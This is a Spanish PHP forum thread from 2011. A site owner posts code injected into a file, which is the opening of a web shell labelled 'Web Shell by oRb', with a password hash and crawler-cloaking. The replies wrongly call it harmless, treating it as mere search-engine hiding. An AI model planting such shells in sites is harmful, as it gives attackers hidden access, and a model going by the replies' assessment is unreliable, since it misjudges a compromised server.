Foros del Web » Programando para Internet » PHP »

Me intentaron Hackear con este codigo

Estas en el tema de Me intentaron Hackear con este codigo en el foro de PHP en Foros del Web. Fijense que me intentaron Hackear... y a un archivo critico le injectaron este codigo... la verdad es que no lograron mayor cosas porque el php ...
  #1 (permalink)  
Antiguo 13/05/2011, 13:00
 
Fecha de Ingreso: abril-2008
Mensajes: 88
Antigüedad: 16 años, 8 meses
Puntos: 5
Me intentaron Hackear con este codigo

Fijense que me intentaron Hackear... y a un archivo critico le injectaron este codigo... la verdad es que no lograron mayor cosas porque el php se murio, ahora tengo la duda sobre que intentaban hacer... alguien tiene alguna idea

Este es el codigo que injectaron:

Código PHP:
<?php # Web Shell by oRb
$auth_pass "63a9f0ea7bb98050796b649e85481845";
$color "#df5";
$default_action 'FilesMan';
$default_use_ajax true;
$default_charset 'Windows-1251';

if(!empty(
$_SERVER['HTTP_USER_AGENT'])) {
    
$userAgents = array("Google""Slurp""MSNBot""ia_archiver""Yandex""Rambler");
    if(
preg_match('/' implode('|'$userAgents) . '/i'$_SERVER['HTTP_USER_AGENT'])) {
        
header('HTTP/1.0 404 Not Found');
        exit;
    }
}
%
  #2 (permalink)  
Antiguo 13/05/2011, 13:09
Avatar de pateketrueke
Modernizr
 
Fecha de Ingreso: abril-2008
Ubicación: Mexihco-Tenochtitlan
Mensajes: 26.399
Antigüedad: 16 años, 8 meses
Puntos: 2534
Respuesta: Me intentaron Hackear con este codigo

Ese código no hace nada malo...

Nada de nada, de nada, nadita, ¡nada!

Bueno lo único que hace es verificar que el UA no sea un robot/crawler, y en caso de ser envía el estado HTTP 404.
__________________
Y U NO RTFM? щ(ºдºщ)

No atiendo por MP nada que no sea personal.
  #3 (permalink)  
Antiguo 13/05/2011, 13:10
Avatar de zerokilled
Javascripter
 
Fecha de Ingreso: abril-2009
Ubicación: Isla del Encanto, La Borinqueña [+>==]
Mensajes: 8.050
Antigüedad: 15 años, 7 meses
Puntos: 1485
Respuesta: Me intentaron Hackear con este codigo

buenas,
aparentemente el intento era indicarle a los buscadores que dicho documento no existe. probablemente para quitarle posicion en los buscadores.
__________________
la maldad es una virtud humana,
y la espiritualidad es la lucha del hombre contra su maldad.
  #4 (permalink)  
Antiguo 13/05/2011, 13:12
 
Fecha de Ingreso: abril-2008
Mensajes: 88
Antigüedad: 16 años, 8 meses
Puntos: 5
Respuesta: Me intentaron Hackear con este codigo

Gracias pateketrueke, la verdad no entendia porque estaba haciendo eso, pero igual tenia que preguntar...

Buena onda rey.
  #5 (permalink)  
Antiguo 13/05/2011, 17:25
Avatar de Sourcegeek
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: $mex['B.C.'];
Mensajes: 1.816
Antigüedad: 15 años, 7 meses
Puntos: 322
Respuesta: Me intentaron Hackear con este codigo

De hecho el código hace justo lo que dijo Zerokilled....
Se creó un array con los agentes de los buscadores más comúnes (como por ejemplo Google).. De ahí compara el agente del que visita la página con los del array... Si son iguales, redirecciona a un error 404 (documento inexistente). Con esto, el buscador toma el archivo como inexistente y no lo indexa..
Qué se logra con esto? Que no aparezca en los buscadores
__________________
Buscas desarrollador web? Sourcegeek. Diseño web, Maquetación y Programación
¡Escribe bien! Esto es un foro, no un Facebook para que escribas con los pies
  #6 (permalink)  
Antiguo 14/05/2011, 18:55
Avatar de gildus  
Fecha de Ingreso: agosto-2003
Mensajes: 1.495
Antigüedad: 21 años, 4 meses
Puntos: 105
Respuesta: Me intentaron Hackear con este codigo

Holas,

Pero que diferencia habria si lo hacias con .htaccess ?

Saludos
Gildus
__________________
.: Gildus :.
  #7 (permalink)  
Antiguo 14/05/2011, 18:58
Avatar de zerokilled
Javascripter
 
Fecha de Ingreso: abril-2009
Ubicación: Isla del Encanto, La Borinqueña [+>==]
Mensajes: 8.050
Antigüedad: 15 años, 7 meses
Puntos: 1485
Respuesta: Me intentaron Hackear con este codigo

@gildus, me parece que no comprendistes el asunto. el codigo se lo inyectaron, no fue que el autor queria implementar algo similar.
__________________
la maldad es una virtud humana,
y la espiritualidad es la lucha del hombre contra su maldad.

Etiquetas: hack, hacker, preg_match
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 14:21.